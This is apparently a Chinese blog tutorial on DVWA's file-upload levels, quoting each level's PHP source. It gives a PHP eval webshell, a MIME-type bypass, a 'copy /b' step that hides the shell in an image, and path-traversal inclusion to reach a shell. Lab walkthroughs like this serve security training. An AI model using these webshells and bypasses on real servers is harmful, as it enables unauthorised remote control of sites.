DVWA-文件上传upload

最新推荐文章于 2024-06-13 08:40:19 发布
最新推荐文章于 2024-06-13 08:40:19 发布
阅读量2k 收藏 19
点赞数 3
分类专栏: DVWA通关教程 文章标签: 安全漏洞 靶机 渗透测试
本文链接:https://blog.csdn.net/weixin_59679023/article/details/121016877
版权

实验环境

DVWA靶机:172.16.12.10

windos攻击机:172.16.12.7

kali攻击机:172.16.12.30

实验步骤

一、Low级

1、查看源码及分析

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
//文件的目标路径hackable/uploads/,也就是文件上传的位置
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
// basename(path,suffix)

函数返回路径中的文件名部分,如果可选参数suffix为空,则返回的文件名包含后缀名,反之不包含后缀名。
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
//移动用户上传文件至目标路径
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息

2、漏洞利用

文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知。不幸的是,这里三个条件全都满足。

1、创建一句话木马文件

打开记事本,输入 <?php @eval($_POST['cuiyi']);?> ,保存后缀名为.php

上传该文件,并复制红色框内的链接

2、拼接地址为http://172.16.12.10:81/hackable/uploads/cuiyi.php,使用菜刀连接

打开菜刀,右击空白地方,点击添加

复制进去刚才的拼接地址,点击添加,链接后面的框输入刚才设置的口令 “cuiyi”,脚本类型选PHP,字符编码选GB2312,点击添加

成功添加,双击该链接

成功连接到DVWA

二、Medium级

1、源码分析

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
//文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

可以看到,Medium级别的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)

2、漏洞复现

抓包修改文件类型,上传cuiyi.php文件,通过Burpsuite改包,格式改为image/jpeg

点击放包,切换回浏览器,发现成功上传

接下来可按之前步骤继续用菜刀连

三、High级

1、源码分析

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
// strtoLower把所有字符转换为小写
getimagesize(string filename)
函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。
可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”*.jpg”、”*.jpeg” 、”*.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。
    if( ( strtoLower( $uploaded_ext ) == "jpg" || strtoLower( $uploaded_ext ) == "jpeg" || strtoLower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

函数解析
strrpos(string,find,start):
函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。
getimagesize(stringfilename):
函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。
可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须
是”.jpg”、”.jpeg”、”*.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。

2、漏洞复现

方法一:将木马隐藏在图片中绕过(High文件上传+Low等级文件包含)

准备一张真正的图片1.jpg,然后和cuiyi.php进行合并,生成以jpg后缀名的新文件test.jpg

按WIN+R打开命令提示符,切换到木马和图片所在目录,

输入copy 1.jpg/b + cuiyi.php/a test.jpg

上传新生成的test.php文件,成功绕过并上传

复制上图路径,拼接新的url:http://172.16.12.10:81/vulnerabilities/fi/?page=../../hackable/uploads/test.jpg ,打开Brup准备抓包

DVWA安全调整为Low,选择文件包含,并在地址栏输入http://172.16.12.10:81/vulnerabilities/fi/?page=../../hackable/uploads/test.jpg ,按回车

抓包如下,复制Cookie这一行

打开中国菜刀,复制刚才的url进去,参数cuiyi,点击添加

右击菜刀空白处,点设置

选择请求头,把刚才的cookie复制进去,点开启—确定

双击该条目

成功获取目标站点shell

方法二:用msfvenom生成的以php代码的图片木马中加入GIF89a;图片欺诈头部绕过(High文件上传+Low文件包含)

在终端首先用msfvenom生成一个PHP语言的PNG图片木马123.png

浏览器访问https://172.16.12.10:81,选择文件上传,上传图片木马,显示失败

切换到终端,然后我们用VIM编辑器(这里没限定编辑器)在sam.png图片木马头部加一个代码GIF89a;

切换到浏览器再次上传,显示成功,复制红色框内地址

在终端输入msfdb run进入控制台

运行侦听器,输入以下命令

选择Low级别的文件包含

地址栏输入如下url:172.16.12.10:81/vulnerabilities/fi/?page=../../hackable/uploads/123.png,并回车

切换回终端,输入getuid,成功获得站点shell

四、Impossible级

1、源码分析

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
//上传文件的文件前缀md5加密
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
//in_get(varname)
函数返回相应选项的值
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtoLower( $uploaded_ext ) == 'jpg' || strtoLower( $uploaded_ext ) == 'jpeg' || strtoLower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
//imagecreatefromjpeg ( filename )
函数返回图片文件的图像标识,失败返回false
            $img = imagecreatefromjpeg( $uploaded_tmp );
//imagejpeg ( image , filename , quality)
从image图像以filename为文件名创建一个JPEG图像,可选参数quality,范围从0(最差质量,文件更小)到100(最佳质量,文件最大)。
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
// imagedestroy( img )
函数销毁图像资源
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

函数说明
in_get(varname):
函数返回相应选项的值
imagecreatefromjpeg(filename):
函数返回图片文件的图像标识,失败返回false
imagejpeg(image,filename,quality):
从image图像以filename为文件名创建一个JPEG图像,可选参数quality,范围从0(最差质量,文件更小)到100(最佳质量,文件最大)。
imagedestroy(img):
函数销毁图像资源

可以看到,Impossible级别的代码对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRFtoken防护CSRF攻击,同时上传成功后作不显示文件上传的路径,导致攻击者无法连接上含有恶意脚本的图片文件。而且似乎将图片重做了,在上传的图片文件中也找不到恶意脚本了。

Cwillchris
关注
  • 3
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
DVWA--file upload文件上传
weixin_50342860的博客
08-23 1369
目录风险lowmediumhigh总结 风险 对上传的文件类型,内容没有进行严格的过滤、检查,使攻击者可以上传木马获取服务器webshell权限。 low 查看代码,对上传文件没有做任何的过滤措施 basename(path,suffix)函数:点这里 全局数组 $_FILES: 点这里 move_uploaded_file() 函数:点这里 1. 写一句话木马1.php上传 <?php @eval($_POST['hello']); ?> 2. 上传成功,给出了上传文件路径,访问获
DVWA-File Upload(文件上传)
简简的博客
02-02 473
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
利用DVWA演示文件上传漏洞获取网站shell权限(High级别)
最新发布
weixin_43822401的博客
06-13 600
文件上传漏洞是网络安全中常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件到服务器上,从而获得对网站的远程控制权限。本文将以DVWA (Damn Vulnerable Web Application) 为例,演示如何利用文件上传漏洞的High级别设置,绕过文件类型和内容限制,获得网站的shell权限。
DVWA-文件上传(File Upload
weixin_58954236的博客
08-20 803
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA 之 File Upload文件上传
RexHa的博客
10-02 2710
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA---文件上传
孤的博客
11-20 411
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA靶场系列(四)—— File Upload文件上传
qq_45612828的博客
07-12 5894
DVWA靶场系列(四)—— File Upload文件上传
5、DVWA——文件上传
qq_55202378的博客
09-11 865
DVWA 文件上传
DVWA文件上传(File Upload
qq_39682037的博客
03-21 2600
文件上传(File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA篇_文件上传
求大佬师傅带
05-25 1472
记一次DVWA文件上传漏洞复现
DVWA文件上传
m0_50211409的博客
03-02 446
DVWA文件上传 文件上传漏洞,通常是由于对上传文件的mame类型、没有进行严格的过滤、检查,使得攻击者可以通过上传木马,获取服务器的webshell权限,件上传漏洞带来的危害常常是毁灭性的 文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知的。 我们测试的靶场是dvwa,至于怎么搭建可以自行百度。 工具:burp,一句话,靶场环境,蚁剑 LOW级别漏洞利用 1.创建一个txt文件将<?php @eval($_REQUEST
DVWA-File Upload(Medium)
七月_的博客
10-23 305
文章目录File Upload(Medium)代码分析 File Upload(Medium) 代码分析 ```php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/u...
DVWA——File Upload
qq_41007744的博客
05-23 305
File UploadLow&lt;?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basenam...
DVWA 文件上传
m0_56107268的博客
04-30 2063
Low File Upload Source vulnerabilities/upload/source/low.php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILE..
DVWA(文件上传)
weixin_44023403的博客
12-06 339
DVWA文件上传文件上传(File Upload)LowMedium 文件上传(File Upload文件上传介绍: 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 文件上传漏洞的利用的条件: 1.能够成功上传木马文件; 2.上传文件必须能够被执行; 3.上传文件的路径必须可知. Low 源码: <?php if( isset( $_POST[ 'Upload'
DVWA靶场-----FIle Upload文件上传
m0_65712192的博客
11-14 1985
DVWA靶场-----FIle Upload文件上传
dvwa靶场文件上传漏洞高级(high)
07-08
dvwa靶场是一个用于学习和测试Web应用程序漏洞的虚拟环境。文件上传漏洞是一种常见的安全漏洞,允许攻击者上传恶意文件到服务器上,可能导致远程代码执行或其他安全问题。 在dvwa靶场中,高级(high)级别的文件上传漏洞可通过以下步骤进行利用: 1. 登录到dvwa靶场:打开浏览器,输入dvwa的URL(如http://localhost/dvwa),然后使用默认的用户名和密码(admin/password)登录到dvwa靶场。 2. 寻找文件上传功能:在左侧的导航栏中,选择"File Upload"(文件上传)。 3. 检查上传限制:在高级级别中,dvwa通常会对上传文件的类型、大小和扩展名进行限制。查看页面上可能存在的任何限制提示。 4. 绕过文件类型限制:通常,服务器会根据文件扩展名来判断文件类型。尝试使用常见的绕过技巧,例如将文件扩展名修改为允许的类型之一(例如,将".php"修改为".jpg")。 5. 绕过文件大小限制:如果服务器对文件大小进行了限制,可以尝试使用分片上传或其他技术来绕过这些限制。 6. 利用上传的文件:一旦成功上传文件,可以尝试执行任意代码或访问上传的文件。 请注意,上述步骤仅适用于学习和测试目的,在真实环境中利用文件上传漏洞是非法的。确保在合法、合规的环境中进行安全测试,并遵守适用法律和道德准则。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cwillchris

你的鼓励将让我产出更多优质干货

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值